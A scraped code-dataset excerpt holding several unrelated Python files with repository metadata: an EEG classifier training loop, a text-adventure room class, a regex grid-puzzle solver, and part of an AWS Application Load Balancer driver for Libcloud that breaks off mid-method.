{}\n options['uidx'] = 0\n options['P'] = 2\n options['sigma'] = np.float32(0.001)\n options['C0'] = C0\n mat = scipy.io.loadmat('./Autism_position.mat')\n options['Lx'] = mat['chanlocs'].astype('float32') \n options['T'] = T\n options['C'] = C\n options['e_K'] = K\n options['e_Nt'] = Nt\n options['e_filter_shape'] = (K,C,1,Nt)\n options['cl_pool_size'] = pool_size_cl\n options['Wy'] =int(np.floor(float(T)/float(options['cl_pool_size'])))\n options['dropout_rate'] = drop_rate\n options['cl_Wy'] = options['Wy'] * K \n options['cl_ny'] = np.max(labtrain) + 1\n options['pre_Wy'] = options['Wy'] * K\n options['pre_ny'] = options['cl_ny']\n options['n_y'] = np.max(labtrain) + 1\n estop = False\n history_errs = []\n history_aucs = []\n best_p = None\n bad_counter = 0\n uidx = 0 # number of update done\n inits = init_params(options,'all')\n params = inits\n tparams = init_tparams(params)\n before = np.zeros((2,))\n _x,_y,f_conv,f_pred_prob, f_pred, _cost= build_model(tparams,options)\n _lr = tensor.scalar(name = 'lr')\n f_cost = theano.function([_x,_y],_cost)\n f_grad_shared, f_update = optimizers.Adam(tparams,_cost,[_x,_y],_lr)\n \n print('Start Pre-Training...')\n start_time = time.time() \n try:\n for eidx in xrange(max_epochs):\n batch_index = get_minibatches_idx(train.shape[0], batch_size,shuffle = True)\n for _, train_index in batch_index:\n uidx = uidx + 1\n options['uidx'] = options['uidx'] + 1\n x = train[train_index,:,:]\n y = labtrain[train_index]\n cost = f_grad_shared(x,y)\n f_update(lrate,0.)\n if np.mod(eidx + 1,dispFreq) == 0:\n print('Epoch ' + str(eidx) + ' Update ' + str(uidx) + ' Cost ' + str(cost))\n if np.mod(eidx + 1, saveFreq) == 0:\n if best_p is not None:\n params = best_p\n else:\n params = unzip(tparams)\n np.savez('./model.npz',history_errs = history_errs,**params)\n if np.mod(eidx + 1,validFreq) == 0:\n train_prod,train_pred, train_err = pred_error_all(f_pred,f_pred_prob, train, labtrain)\n #train_auc = metrics.roc_auc_score(labtrain,train_pred[:,1])\n val_prod, val_pred, val_err = pred_error_all(f_pred,f_pred_prob, val, labval)\n #val_auc = metrics.roc_auc_score(labval,val_pred[:,1])\n test_prod, test_pred, test_err = pred_error_all(f_pred,f_pred_prob, test, labtest)\n #test_auc = metrics.roc_auc_score(labtest,test_pred[:,1])\n history_errs.append([train_err,val_err,test_err])\n #history_aucs.append([train_auc,val_auc,test_auc]) \n print('Train ' + str(train_err) + ' Val ' + str(val_err) + ' Test ' + str(test_err))\n #print('Train ' + str(train_auc) + ' Val ' + str(val_auc) + ' Test ' + str(test_auc)) \n if uidx == 0 or val_err<=np.array(history_errs)[:,1].min():\n best_p = unzip(tparams)\n bad_counter = 0\n before[0] = test_err\n #before[1] = test_auc\n confusion = sklearn.metrics.confusion_matrix(labtest,test_pred)\n if len(history_errs) > patience and val_err >= np.array(history_errs)[:-patience,0].min():\n bad_count = bad_counter + 1\n if bad_counter > patience:\n estop = True\n break\n if estop:\n break\n \n \n \n except KeyboardInterrupt:\n print('Training interrupted')\n end_time = time.time()\n if best_p is not None:\n zipp(best_p,tparams)\n else:\n best_p = unzip(tparams)\n \n \n \n max_epochs = 100\n patience = 10\n lrate = 0.002\n valid_batch = 100\n print('Start Training...')\n start_time = time.time() \n try:\n for eidx in xrange(max_epochs):\n batch_index = get_minibatches_idx(train.shape[0], batch_size,shuffle = True)\n for _, train_index in batch_index:\n uidx = uidx + 1\n options['uidx'] = options['uidx'] + 1\n x = train[train_index,:,:]\n y = labtrain[train_index]\n cost = f_grad_shared(x,y)\n f_update(lrate,1.)\n if np.mod(eidx + 1,dispFreq) == 0:\n print('Epoch ' + str(eidx) + ' Update ' + str(uidx) + ' Cost ' + str(cost))\n if np.mod(eidx + 1, saveFreq) == 0:\n if best_p is not None:\n params = best_p\n else:\n params = unzip(tparams)\n np.savez('./model.npz',history_errs = history_errs,**params)\n if np.mod(eidx + 1,validFreq) == 0:\n train_prod, train_pred, train_err = pred_error_all(f_pred,f_pred_prob, train, labtrain)\n #train_auc = metrics.roc_auc_score(labtrain,train_pred[:,1])\n val_prod, val_pred, val_err = pred_error_all(f_pred,f_pred_prob, val, labval)\n #val_auc = metrics.roc_auc_score(labval,val_pred[:,1])\n test_prod, test_pred, test_err = pred_error_all(f_pred,f_pred_prob, test, labtest)\n #test_auc = metrics.roc_auc_score(labtest,test_pred[:,1])\n history_errs.append([train_err,val_err,test_err])\n #history_aucs.append([train_auc,val_auc,test_auc]) \n print('Train ' + str(train_err) + ' Val ' + str(val_err) + ' Test ' + str(test_err))\n #print('Train ' + str(train_auc) + ' Val ' + str(val_auc) + ' Test ' + str(test_auc)) \n if uidx == 0 or val_err<=np.array(history_errs)[:,1].min():\n best_p = unzip(tparams)\n bad_counter = 0\n before[0] = test_err\n #before[1] = test_auc\n confusion = sklearn.metrics.confusion_matrix(labtest,test_pred)\n if len(history_errs) > patience and val_err >= np.array(history_errs)[:-patience,0].min():\n bad_count = bad_counter + 1\n if bad_counter > patience:\n estop = True\n break\n if estop:\n break\n \n except KeyboardInterrupt:\n print('Training interrupted')\n end_time = time.time()\n if best_p is not None:\n zipp(best_p,tparams)\n else:\n best_p = unzip(tparams)\n scipy.io.savemat(result_path + '/Result_' + str(test_id + 1) + '_' + str(before[0]) + '.mat',{'inits':inits, 'best_p':best_p, 'history_errs':history_errs,'confusion':confusion}) \n print('Best Test Error is: ' + str(before[0]) + ', AUC is' + str(before[1]))\n","repo_name":"yitong91/SyncNet","sub_path":"Theano_Version/main_autism.py","file_name":"main_autism.py","file_ext":"py","file_size_in_byte":9848,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"37"} +{"seq_id":"7406773311","text":"from text_splitter import *\r\n\r\n\r\nclass Room:\r\n def __init__(self, room_name, long_description=None, short_description=None, look_at=None, exits=None):\r\n self.name = room_name\r\n self.long_description = long_description\r\n self.short_description = short_description\r\n self.look_at = look_at\r\n self.exits = exits\r\n self.linked_rooms = {}\r\n self.items_in_room = {}\r\n self.is_locked = True\r\n self.first_visit = True\r\n self.been_explored = False\r\n self.features = {}\r\n\r\n def get_name(self):\r\n return self.name\r\n\r\n def set_description(self, room_description):\r\n self.description = room_description\r\n\r\n def get_description(self):\r\n return self.long_description\r\n\r\n def get_secondary_description(self):\r\n if self.name == \"Wine Cellar\":\r\n if self.is_locked == True:\r\n return self.short_description['locked']\r\n else:\r\n return self.short_description['unlocked']\r\n elif self.name == \"Library\":\r\n if self.is_locked == True:\r\n return self.short_description['locked']\r\n else:\r\n return self.short_description['unlocked']\r\n elif self.name == \"Master Suite\":\r\n if self.is_locked == True:\r\n return self.short_description['not moved']\r\n else:\r\n return self.short_description['moved']\r\n elif self.name == 'Basement':\r\n if self.is_locked == True:\r\n return self.short_description['not used flashlight']\r\n else:\r\n return self.short_description['used flashlight']\r\n elif self.name == 'Secret Room':\r\n if self.is_locked == True:\r\n return self.short_description['not cut chain']\r\n else:\r\n return self.short_description['cut chain']\r\n return self.short_description\r\n\r\n def describe(self):\r\n if self.first_visit:\r\n print_split(self.get_description())\r\n self.first_visit = False\r\n else:\r\n print_split(self.get_secondary_description())\r\n\r\n def link_room(self, room_to_link, direction):\r\n self.linked_rooms[direction] = room_to_link\r\n\r\n def get_details(self):\r\n count = 1\r\n print(\"=\"*TEXT_WIDTH)\r\n print(self.get_name())\r\n print(\"=\"*TEXT_WIDTH)\r\n self.describe()\r\n has_gettable_items = False\r\n for key, value in self.items_in_room.items(): # check for getable items in room\r\n if value.is_getable == True:\r\n has_gettable_items = True\r\n if has_gettable_items:\r\n print(\"-\"*TEXT_WIDTH)\r\n print(\"The following items are in the room:\")\r\n\r\n for key, value in self.items_in_room.items(): # display all items that are getable\r\n if value.is_getable:\r\n print_split(\"%2d: %s: %s\" %\r\n (count, value.name, value.description))\r\n count += 1\r\n print(\"-\"*TEXT_WIDTH)\r\n\r\n for direction in self.linked_rooms:\r\n room = self.linked_rooms[direction]\r\n print(\"The \" + room.get_name() + \" is \" + direction)\r\n\r\n def move(self, direction):\r\n if direction in self.linked_rooms:\r\n return self.linked_rooms[direction]\r\n else:\r\n print(\"You can't go that way\")\r\n return self\r\n\r\n def get_explore(self):\r\n if not self.been_explored:\r\n self.been_explored = True\r\n\r\n def add_feature(self, key, value):\r\n self.features[key] = value\r\n\r\n def add_item(self, item):\r\n self.items_in_room[item.name] = item\r\n\r\n def take_item(self, item):\r\n del self.items_in_room[item]\r\n","repo_name":"kevinbray84/467","sub_path":"room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15316887783","text":"import os\n\nfrom common import RegCommon\n\ngrids = []\n\n\ndef narrow_letters(groups):\n group_letters = []\n for item in groups[0]:\n while len(group_letters) < len(item):\n group_letters.append(set())\n\n for lidx, letter in enumerate(item):\n group_letters[lidx].add(letter)\n\n return group_letters\n\n\ndef reduce_matches(letters, group):\n new_group = []\n for idx, items in enumerate(group):\n possible_letters = letters[idx]\n new_group.append([])\n for item in items:\n if item[0] not in possible_letters:\n continue\n\n new_group[idx].append(item)\n\n return new_group\n\n\ndef narrow_choices():\n col_letters = narrow_letters(RegCommon.col_matches)\n RegCommon.row_matches = reduce_matches(col_letters, RegCommon.row_matches)\n\n row_letters = narrow_letters(RegCommon.row_matches)\n RegCommon.col_matches = reduce_matches(row_letters, RegCommon.col_matches)\n \n\ndef compare_cols_to_rows():\n global grids\n \n one, two, three, four = RegCommon.col_matches\n \n for r1 in one:\n for r2 in two:\n for r3 in three:\n for r4 in four:\n rows = [[r1[idx],r2[idx],r3[idx],r4[idx]] for idx in range(0,4)]\n grid = [''.join(row) in RegCommon.row_matches[idx] for idx, row in enumerate(rows)]\n if all(grid): \n grids.append(rows)\n\n\ndef write_grids():\n global grids\n pth = os.path.dirname(os.path.abspath(__file__))\n fp = '{}/matching_grids.txt'.format(pth)\n with open(fp, 'w+') as fd:\n for grid in grids:\n lines = [' '.join(line) + '\\n' for line in grid]\n fd.writelines(lines)\n\n\ndef compare_main():\n narrow_choices()\n compare_cols_to_rows()\n write_grids()\n\n\nif __name__ == \"__main__\":\n compare_main()","repo_name":"davidlathrop/workatlinkedinpuzzle","sub_path":"regex_test/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23689935052","text":"__all__ = [\"ApplicationLBDriver\"]\n\nfrom libcloud.utils.xml import findall, findtext\nfrom libcloud.common.aws import AWSGenericResponse, SignedAWSConnection\nfrom libcloud.loadbalancer.base import Driver, Member, LoadBalancer\nfrom libcloud.loadbalancer.types import State\n\nVERSION = \"2015-12-01\"\nHOST = \"elasticloadbalancing.%s.amazonaws.com\"\nROOT = \"/%s/\" % (VERSION)\nNS = \"http://elasticloadbalancing.amazonaws.com/doc/{}/\".format(VERSION)\n\n\nclass ALBResponse(AWSGenericResponse):\n \"\"\"\n Amazon ALB response class.\n \"\"\"\n\n namespace = NS\n exceptions = {}\n xpath = \"Error\"\n\n\nclass ALBConnection(SignedAWSConnection):\n version = VERSION\n host = HOST\n responseCls = ALBResponse\n service_name = \"elasticloadbalancing\"\n\n\nclass ALBTargetGroup:\n \"\"\"\n AWS ALB target group class\n http://docs.aws.amazon.com/elasticloadbalancing/latest/application/load-balancer-target-groups.html\n \"\"\"\n\n def __init__(\n self,\n target_group_id,\n name,\n protocol,\n port,\n vpc,\n driver,\n health_check_timeout=5,\n health_check_port=\"traffic-port\",\n health_check_path=\"/\",\n health_check_proto=\"HTTP\",\n health_check_matcher=\"200\",\n health_check_interval=30,\n healthy_threshold=5,\n unhealthy_threshold=2,\n balancers=[],\n members=[],\n ):\n self.id = target_group_id\n self.name = name\n self.protocol = protocol\n self.port = port\n self.vpc = vpc\n self.health_check_timeout = health_check_timeout\n self.health_check_port = health_check_port\n self.health_check_path = health_check_path\n self.health_check_proto = health_check_proto\n self.health_check_matcher = health_check_matcher\n self.health_check_interval = health_check_interval\n self.healthy_threshold = healthy_threshold\n self.unhealthy_threshold = unhealthy_threshold\n\n self._balancers = balancers\n self._balancers_arns = [lb.id for lb in balancers] if balancers else []\n self._members = members\n self._members_ids = [mb.id for mb in members] if members else []\n self._driver = driver\n\n @property\n def balancers(self):\n if not self._balancers and self._balancers_arns:\n self._balancers = []\n for balancer_arn in self._balancers_arns:\n self._balancers.append(self._driver.get_balancer(balancer_arn))\n return self._balancers\n\n @balancers.setter\n def balancers(self, val):\n self._balancers = val\n self._balancers_arns = [lb.id for lb in val] if val else []\n\n @property\n def members(self):\n if not self._members:\n mbrs = self._driver._ex_get_target_group_members(self)\n self._members = mbrs\n self._members_ids = [mb.id for mb in mbrs] if mbrs else []\n\n return self._members\n\n @members.setter\n def members(self, val):\n self._members = val\n self._members_ids = [mb.id for mb in val] if val else []\n\n\nclass ALBListener:\n \"\"\"\n AWS ALB listener class\n http://docs.aws.amazon.com/elasticloadbalancing/latest/application/load-balancer-listeners.html\n \"\"\"\n\n def __init__(\n self,\n listener_id,\n protocol,\n port,\n balancer,\n driver,\n action=\"\",\n ssl_policy=\"\",\n ssl_certificate=\"\",\n rules=[],\n ):\n self.id = listener_id\n self.protocol = protocol\n self.port = port\n self.action = action\n self.ssl_policy = ssl_policy\n self.ssl_certificate = ssl_certificate\n\n self._balancer = balancer\n self._balancer_arn = balancer.id if balancer else None\n self._rules = rules\n self._driver = driver\n\n @property\n def balancer(self):\n if not self._balancer and self._balancer_arn:\n self._balancer = self._driver.get_balancer(self._balancer_arn)\n return self._balancer\n\n @balancer.setter\n def balancer(self, val):\n self._balancer = val\n self._balancer_arn = val.id\n\n @property\n def rules(self):\n if not self._rules:\n self._rules = self._driver._ex_get_rules_for_listener(self)\n return self._rules\n\n @rules.setter\n def rules(self, val):\n self._rules = val\n\n\nclass ALBRule:\n \"\"\"\n AWS ALB listener rule class\n http://docs.aws.amazon.com/elasticloadbalancing/latest/application/load-balancer-listeners.html#listener-rules\n \"\"\"\n\n def __init__(\n self,\n rule_id,\n is_default,\n priority,\n target_group,\n driver,\n conditions={},\n listener=None,\n ):\n self.id = rule_id\n self.is_default = is_default\n self.priority = priority\n self.conditions = conditions\n\n self._listener = listener\n self._listener_arn = listener.id if listener else None\n self._target_group = target_group\n self._target_group_arn = target_group.id if target_group else None\n self._driver = driver\n\n @property\n def target_group(self):\n if not self._target_group and self._target_group_arn:\n self._target_group = self._driver.ex_get_target_group(self._target_group_arn)\n return self._target_group\n\n @target_group.setter\n def target_group(self, val):\n self._target_group = val\n self._target_group_arn = val.id\n\n @property\n def listener(self):\n if not self._listener and self._listener_arn:\n self._listener = self.driver.ex_get_listener(self._listener_arn)\n return self._listener\n\n @listener.setter\n def listener(self, val):\n self._listener = val\n self._listener_arn = val.id\n\n\nclass ApplicationLBDriver(Driver):\n name = \"Amazon Application Load Balancing\"\n website = \"http://aws.amazon.com/elasticloadbalancing/\"\n connectionCls = ALBConnection\n signature_version = \"4\"\n\n def __init__(self, access_id, secret, region, token=None):\n self.token = token\n self.region = region\n self.region_name = region\n super().__init__(access_id, secret, token=token, host=HOST % region, region=region)\n\n def list_protocols(self):\n \"\"\"\n Return list of protocols supported by driver\n\n :rtype: ``list`` of ``strings``\n \"\"\"\n return [\"http\", \"https\"]\n\n def list_balancers(self):\n \"\"\"\n List all load balancers\n\n :rtype: ``list`` of :class:`LoadBalancer`\n \"\"\"\n params = {\"Action\": \"DescribeLoadBalancers\"}\n data = self.connection.request(ROOT, params=params).object\n return self._to_balancers(data)\n\n def get_balancer(self, balancer_id):\n \"\"\"\n Get a load balancer object by ARN\n\n :param balancer_id: ARN of load balancer you wish to fetch.\n :type balancer_id: ``str``\n\n :rtype: :class:`LoadBalancer`\n \"\"\"\n params = {\n \"Action\": \"DescribeLoadBalancers\",\n \"LoadBalancerArns.member.1\": balancer_id,\n }\n data = self.connection.request(ROOT, params=params).object\n return self._to_balancers(data)[0]\n\n def create_balancer(\n self,\n name,\n port,\n protocol,\n algorithm,\n members,\n ex_scheme=None,\n ex_security_groups=None,\n ex_subnets=None,\n ex_tags=None,\n ex_ssl_cert_arn=None,\n ):\n \"\"\"\n Create a new load balancer instance.\n\n AWS ALB balancer creation consists of 5 steps:\n http://docs.aws.amazon.com/elasticloadbalancing/latest/APIReference/Welcome.html\n\n create_balancer() is a standard API method so, it's made as a wrapper\n here to preserve compatibility with other drivers where LB creation\n is one-step process. It calls respective ALB methods to assemble\n ready-to-use load balancer.\n\n :param name: Name of the new load balancer\n :type name: ``str``\n\n :param port: Port number to setup load balancer listener\n :type port: ``int``\n\n :param protocol: Load balancer protocol, should be 'HTTP' or 'HTTPS'.\n :type protocol: ``str``\n\n :param algorithm: Load balancing algorithm. Ignored for AWS ALB.\n :type algorithm: :class:`Algorithm` or ``None``\n\n :param members: List of Members to attach to the balancer. If 'port'\n attribute is set for the member - load balancer will\n send traffic there. Otherwise - load balancer port is\n used on the memeber's side. 'ip' attribute is ignored.\n :type members: ``list`` of :class:`Member`\n\n :param ex_scheme: Scheme of load balancer. Can be 'internet-facing' or\n 'internal'.\n :type ex_scheme: ``str``\n\n :param ex_security_groups: List of load balancer security group ids.\n :type ex_security_groups: ``list`` of ``str``\n\n :param ex_subnets: List of load balancer subnet ids.\n :type ex_subnets: ``list`` of ``str``\n\n :param ex_tags: Tags to assign to the load balancer.\n :type ex_tags: ``dict``\n\n :param ex_ssl_cert_arn: SSL certificate ARN to use when load balancer\n protocol is 'HTTPS'.\n :type ex_ssl_cert_arn: ``str``\n\n :return: LoadBalancer object\n :rtype: :class:`LoadBalancer`\n \"\"\"\n\n ex_scheme = ex_scheme or \"\"\n ex_security_groups = ex_security_groups or []\n ex_subnets = ex_subnets or []\n ex_tags = ex_tags or {}\n ex_ssl_cert_arn = ex_ssl_cert_arn or \"\"\n\n balancer = self.ex_create_balancer(\n name,\n scheme=ex_scheme,\n security_groups=ex_security_groups,\n subnets=ex_subnets,\n tags=ex_tags,\n )\n\n target_group = self.ex_create_target_group(\n name + \"-tg\",\n port,\n protocol,\n balancer.extra.get(\"vpc\"),\n health_check_proto=protocol,\n )\n self.ex_register_targets(target_group, members)\n listener = self.ex_create_listener(\n balancer, port, protocol, target_group, ssl_cert_arn=ex_ssl_cert_arn\n )\n\n balancer.extra[\"listener\"] = listener\n\n return balancer\n\n def ex_create_balancer(\n self,\n name,\n addr_type=\"ipv4\",\n scheme=\"internet-facing\",\n security_groups=None,\n subnets=None,\n tags=None,\n ):\n \"\"\"\n AWS-specific method to create a new load balancer. Since ALB is a\n composite object (load balancer, target group, listener etc) - extra\n methods must be called to assemble ready-to-use balancer.\n\n :param name: Name of the new load balancer\n :type name: ``str``\n\n :param addr_type: Load balancer address type. Can be 'ipv4' or 'ipv6'.\n :type addr_type: ``str``\n\n :param scheme: Scheme of load balancer. Can be 'internet-facing' or\n 'internal'.\n :type scheme: ``str``\n\n :param security_groups: List of load balancer security group ids.\n :type security_groups: ``list`` of ``str``\n\n :param subnets: List of load balancer subnet ids.\n :type subnets: ``list`` of ``str``\n\n :param tags: Tags to assign to the load balancer.\n :type tags: ``dict``\n\n :return: LoadBalancer object\n :rtype: :class:`LoadBalancer`\n \"\"\"\n\n security_groups = security_groups or []\n subnets = subnets or []\n tags = tags or {}\n\n # mandatory params\n params = {\"Action\": \"CreateLoadBalancer\", \"Name\": name}\n\n idx = 0\n for subnet in subnets:\n idx += 1\n params[\"Subnets.member.\" + str(idx)] = subnet\n\n # optional params\n params.update(\n {\n \"IpAddressType\": addr_type, # Valid Values: ipv4 | dualstack\n \"Scheme\": scheme, # Valid Values: internet-facing | internal\n }\n )\n\n idx = 0\n for sg in security_groups:\n idx += 1\n params[\"SecurityGroups.member.\" + str(idx)] = sg\n\n idx = 0\n for k, v in tags.items():\n idx += 1\n params[\"Tags.member.\" + str(idx) + \".Key\"] = k\n params[\"Tags.member.\" + str(idx) + \".Value\"] = v\n\n data = self.connection.request(ROOT, params=params).object\n\n xpath = \"CreateLoadBalancerResult/LoadBalancers/member\"\n for el in findall(element=data, xpath=xpath, namespace=NS):\n balancer = self._to_balancer(el)\n\n return balancer\n\n def ex_create_target_group(\n self,\n name,\n port,\n proto,\n vpc,\n health_check_interval=30,\n health_check_path=\"/\",\n health_check_port=\"traffic-port\",\n health_check_proto=\"HTTP\",\n health_check_timeout=5,\n health_check_matcher=\"200\",\n healthy_threshold=5,\n unhealthy_threshold=2,\n ):\n \"\"\"\n Create a target group for AWS ALB load balancer.\n\n :param name: Name of target group\n :type name: ``str``\n\n :param port: The port on which the targets receive traffic.\n This port is used unless you specify a port override when\n registering the target.\n :type port: ``int``\n\n :param proto: The protocol to use for routing traffic to the targets.\n Can be 'HTTP' or 'HTTPS'.\n :type proto: ``str``\n\n :param vpc: The identifier of the virtual private cloud (VPC).\n :type vpc: ``str``\n\n :param health_check_interval: The approximate amount of time, in\n seconds, between health checks of an\n individual target. The default is\n 30 seconds.\n :type health_check_interval: ``int``\n\n :param health_check_path: The ping path that is the destination on\n the targets for health checks. The default is /\n :type health_check_path: ``str``\n\n :param health_check_port: The port the load balancer uses when\n performing health checks on targets.\n The default is traffic-port, which indicates\n the port on which each target receives traffic\n from the load balancer.\n :type health_check_port: ``str``\n\n :param health_check_proto: The protocol the load balancer uses when\n performing health checks on targets.\n Can be 'HTTP' (default) or 'HTTPS'.\n :type health_check_proto: ``str``\n\n :param health_check_timeout: The amount of time, in seconds, during\n which no response from a target means\n a failed health check. The default is 5s.\n :type health_check_timeout: ``int``\n\n :param health_check_matcher: The HTTP codes to use when checking for\n a successful response from a target.\n Valid values: \"200\", \"200,202\", \"200-299\".\n :type health_check_matcher: ``str``\n\n :param healthy_threshold: The number of consecutive health checks\n successes required before considering\n an unhealthy target healthy. The default is 5\n :type healthy_threshold: ``int``\n\n :param unhealthy_threshold: The number of consecutive health check\n failures required before considering\n a target unhealthy. The default is 2.\n :type unhealthy_threshold: ``int``\n\n :return: Target group object.\n :rtype: :class:`ALBTargetGroup`\n \"\"\"\n\n # mandatory params\n params = {\n \"Action\": \"CreateTargetGroup\",\n \"Name\": name,\n \"Protocol\": proto,\n \"Port\": port,\n \"VpcId\": vpc,\n }\n\n # optional params\n params.update(\n {\n # Valid Values: Min value of 5. Max value of 300.\n \"HealthCheckIntervalSeconds\": health_check_interval,\n \"HealthCheckPath\": health_check_path,\n \"HealthCheckPort\": health_check_port,\n # Valid Values: HTTP | HTTPS\n \"HealthCheckProtocol\": health_check_proto,\n # Valid Range: Min value of 2. Max value of 60.\n \"HealthCheckTimeoutSeconds\": health_check_timeout,\n # Valid Range: Minimum value of 2. Maximum value of 10.\n \"HealthyThresholdCount\": healthy_threshold,\n # Valid Range: Minimum value of 2. Maximum value of 10.\n \"UnhealthyThresholdCount\": unhealthy_threshold,\n # Valid values: \"200\", \"200,202\", \"200-299\"\n \"Matcher.HttpCode\": health_check_matcher,\n }\n )\n\n data = self.connection.request(ROOT, params=params).object\n\n xpath = \"CreateTargetGroupResult/TargetGroups/member\"\n for el in findall(element=data, xpath=xpath, namespace=NS):\n target_group = self._to_target_group(el)\n\n return target_group\n\n def ex_register_targets(self, target_group, members=None):\n \"\"\"\n Register members as targets at target group\n\n :param target_group: Target group dict where register members.\n :type target_group: ``dict``\n\n :param members: List of Members to attach to the balancer. If 'port'\n attribute is set for the member - load balancer will\n send traffic there. Otherwise - load balancer port is\n used on the memeber's side. 'ip' attribute is ignored.\n :type members: ``list`` of :class:`Member`\n\n :return: True on success, False if no members provided.\n :rtype: ``bool``\n \"\"\"\n\n members = members or []\n\n # mandatory params\n params = {\"Action\": \"RegisterTargets\", \"TargetGroupArn\": target_group.id}\n\n if not members:\n return False\n\n idx = 0\n for member in members:\n idx += 1\n params[\"Targets.member.\" + str(idx) + \".Id\"] = member.id\n if member.port:\n params[\"Targets.member.\" + str(idx) + \".Port\"] = member.port\n\n # RegisterTargets doesn't return any useful data\n self.connection.request(ROOT, params=params)\n\n target_group.members = members\n\n return True\n\n def ex_create_listener(\n self,\n balancer,\n port,\n proto,\n target_group,\n action=\"forward\",\n ssl_cert_arn=None,\n ssl_policy=None,\n ):\n \"\"\"\n Create a listener for application load balancer\n\n :param balancer: LoadBalancer to create listener for\n :type balancer: :class:`LoadBalancer`\n\n :param port: Port number to setup load balancer listener\n :type port: ``int``\n\n :param proto: Load balancer protocol, should be 'HTTP' or 'HTTPS'.\n :type proto: ``str``\n\n :param target_group: Target group associated with the listener.\n :type target_group: :class:`ALBTargetGroup`\n\n :param action: Default action for the listener,\n valid value is 'forward'\n :type action: ``str``\n\n :param ssl_cert_arn: SSL certificate ARN to use when listener protocol\n is 'HTTPS'.\n :type ssl_cert_arn: ``str``\n\n :param ssl_policy: The security policy that defines which ciphers and\n protocols are supported. The default is the current\n predefined security policy.\n Example: 'ELBSecurityPolicy-2016-08'\n :type ssl_policy: ``str``\n\n :return: Listener object\n :rtype: :class:`ALBListener`\n \"\"\"\n\n ssl_cert_arn = ssl_cert_arn or \"\"\n ssl_policy = ssl_policy or \"\"\n\n # mandatory params\n params = {\n \"Action\": \"CreateListener\",\n \"LoadBalancerArn\": balancer.id,\n \"Protocol\": proto, # Valid Values: HTTP | HTTPS\n \"Port\": port, # Valid Range: Min value of 1. Max value of 65535.\n \"DefaultActions.member.1.Type\": action,\n \"DefaultActions.member.1.TargetGroupArn\": target_group.id,\n }\n\n # optional params\n if proto == \"HTTPS\":\n params[\"Certificates.member.1.CertificateArn\"] = ssl_cert_arn\n if ssl_policy:\n params[\"SslPolicy\"] = ssl_policy\n\n data = self.connection.request(ROOT, params=params).object\n\n xpath = \"CreateListenerResult/Listeners/member\"\n for el in findall(element=data, xpath=xpath, namespace=NS):\n listener = self._to_listener(el)\n listener.balancer = balancer\n\n return listener\n\n def ex_create_listener_rule(\n self,\n listener,\n priority,\n target_group,\n action=\"forward\",\n condition_field=None,\n condition_value=None,\n ):\n \"\"\"\n Create a rule for listener.\n\n :param listener: Listener object where to create rule\n :type listener: :class:`ALBListener`\n\n :param priority: The priority for the rule. A listener can't have\n multiple rules with the same priority.\n :type priority: ``str``\n\n :param target_group: Target group object to associate with rule\n :type target_group: :class:`ALBTargetGroup`\n\n :param action: Action for the rule, valid value is 'forward'\n :type action: ``str``\n\n :param condition_field: Rule condition field name. The possible values\n are 'host-header' and 'path-pattern'.\n :type condition_field: ``str``\n\n :param condition_value: Value to match. Wildcards are supported, for\n example: '/img/*'\n\n :return: Rule object\n :rtype: :class:`ALBRule`\n \"\"\"\n\n condition_field = condition_field or \"\"\n condition_value = condition_value or \"\"\n\n # mandatory params\n params = {\n \"Action\": \"CreateRule\",\n \"ListenerArn\": listener.id,\n \"Priority\": priority, # Valid Range: Min value of 1. Max: 99999.\n \"Actions.member.1.Type\": action,\n \"Actions.member.1.TargetGroupArn\": target_group.id,\n # Valid values are host-header and path-pattern.\n \"Conditions.member.1.Field\": condition_field,\n \"Conditions.member.1.Values.member.1\": condition_value,\n }\n\n data = self.connection.request(ROOT, params=params).object\n\n xpath = \"CreateRuleResult/Rules/member\"\n for el in findall(element=data, xpath=xpath, namespace=NS):\n rule = self._to_rule(el)\n rule.listener = listener\n\n return rule\n\n def ex_get_target_group(self, target_group_id):\n \"\"\"\n Get target group object by ARN\n\n :param target_group_id: ARN of target group\n :type target_group_id: ``str``\n\n :return: Target group object\n :rtype: :class:`ALBTargetGroup`\n \"\"\"\n\n # mandatory params\n params = {\n \"Action\": \"DescribeTargetGroups\",\n \"TargetGroupArns.member.1\": target_group_id,\n }\n\n data = self.connection.request(ROOT, params=params).object\n\n return self._to_target_groups(data)[0]\n\n def ex_get_listener(self, listener_id):\n \"\"\"\n Get listener object by ARN\n\n :param listener_id: ARN of listener object to get\n :type listener_id: ``str``\n\n :return: Listener object\n :rtype: :class:`ALBListener`\n \"\"\"\n\n # mandatory params\n params = {\"Action\": \"DescribeListeners\", \"ListenerArns.member.1\": listener_id}\n\n data = self.connection.request(ROOT, params=params).object\n return self._to_listeners(data)[0]\n\n def ex_get_rule(self, rule_id):\n \"\"\"\n Get rule by ARN.\n\n :param rule_id: ARN of rule\n :type rule_id: ``str``\n\n :return: Rule object\n :rtype: :class:`ALBRule`\n \"\"\"\n\n params = {\"Action\": \"DescribeRules\", \"RuleArns.member.1\": rule_id}\n\n data = self.connection.request(ROOT, params=params).object\n return self._to_rules(data)[0]\n\n def _to_listeners(self, data):\n xpath = \"DescribeListenersResult/Listeners/member\"\n return [self._to_listener(el) for el in findall(element=data, xpath=xpath, namespace=NS)]\n\n def _to_listener(self, el):\n listener = ALBListener(\n listener_id=findtext(element=el, xpath=\"ListenerArn\", namespace=NS),\n protocol=findtext(element=el, xpath=\"Protocol\", namespace=NS),\n port=int(findtext(element=el, xpath=\"Port\", namespace=NS)),\n balancer=None,\n driver=self.connection.driver,\n action=findtext(element=el, xpath=\"DefaultActions/member/Type\", namespace=NS),\n ssl_policy=findtext(element=el, xpath=\"SslPolicy\", namespace=NS),\n ssl_certificate=findtext(\n element=el, xpath=\"Certificates/member/CertificateArn\", namespace=NS\n ),\n )\n\n listener._balancer_arn = findtext(element=el, xpath=\"LoadBalancerArn\", namespace=NS)\n\n return listener\n\n def _to_balancer(self, el):\n balancer = LoadBalancer(\n id=findtext(element=el, xpath=\"LoadBalancerArn\", namespace=NS),\n name=findtext(element=el, xpath=\"LoadBalancerName\", namespace=NS),\n state=State.UNKNOWN,\n ip=findtext(el, xpath=\"DNSName\", namespace=NS),\n port=None,\n driver=self.connection.driver,\n )\n\n balancer.extra = {\n \"listeners\": self._ex_get_balancer_listeners(balancer),\n 